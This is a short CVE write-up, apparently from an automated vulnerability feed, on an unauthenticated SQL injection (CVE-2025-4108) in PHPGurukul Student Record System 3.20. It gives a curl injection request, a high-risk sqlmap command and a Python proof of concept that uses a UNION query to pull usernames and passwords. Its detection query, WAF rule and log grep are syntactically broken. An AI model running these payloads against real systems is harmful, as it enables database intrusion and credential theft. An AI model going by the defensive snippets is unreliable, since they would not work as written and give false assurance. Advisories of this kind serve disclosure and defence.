Listen to this Post
How the CVE Works:
CVE-2025-4108 is a critical SQL injection vulnerability in PHPGurukul Student Record System 3.20. The flaw exists in the `sub1` parameter of /add-subject.php, where improper input sanitization allows attackers to inject malicious SQL queries. Since the application does not enforce prepared statements or input validation, an attacker can manipulate database operations remotely. Exploiting this vulnerability may lead to unauthorized data access, modification, or deletion. The attack vector is network-based, requiring no authentication, making it highly exploitable.
DailyCVE Form:
Platform: PHPGurukul SRS
Version: 3.20
Vulnerability: SQL Injection
Severity: Critical
Date: 05/14/2025
What Undercode Say:
Exploitation:
curl -X POST "http://target.com/add-subject.php" --data "sub1=' OR 1=1--"
SQLMAP Command:
sqlmap -u "http://target.com/add-subject.php?sub1=test" --risk=3 --level=5
Mitigation:
1. Patch: Apply vendor updates.
2. Input Sanitization:
$sub1 = mysqli_real_escape_string($conn, $_POST['sub1']);
3. Prepared Statements:
$stmt = $conn->prepare("INSERT INTO subjects (sub1) VALUES (?)");
$stmt->bind_param("s", $_POST['sub1']);
Detection:
SELECT FROM logs WHERE request LIKE '%add-subject.php%sub1=%';
WAF Rule:
location ~ /add-subject.php {
deny "'|\"|;|--";
}
Exploit PoC:
import requests
payload = {"sub1": "' UNION SELECT username, password FROM users--"}
requests.post("http://target.com/add-subject.php", data=payload)
Log Analysis:
grep "POST /add-subject.php" /var/log/apache2/access.log | grep -i "union|select"
Backup Command:
mysqldump -u admin -p student_db > backup.sql
Sources:
Reported By: nvd.nist.gov
Extra Source Hub:
Undercode
